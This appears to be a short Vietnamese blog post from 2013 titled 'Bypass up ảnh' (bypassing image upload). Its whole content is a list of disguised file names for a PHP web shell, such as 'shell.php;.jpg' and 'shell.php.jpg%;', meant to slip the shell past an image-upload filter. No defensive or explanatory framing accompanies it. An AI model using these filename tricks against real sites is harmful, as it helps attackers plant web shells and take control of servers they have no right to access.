Thứ Năm, 30 tháng 5, 2013

Bypass up ảnh

Đổi shell php thành một trong các kiểu.
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;

Không có nhận xét nào:

Đăng nhận xét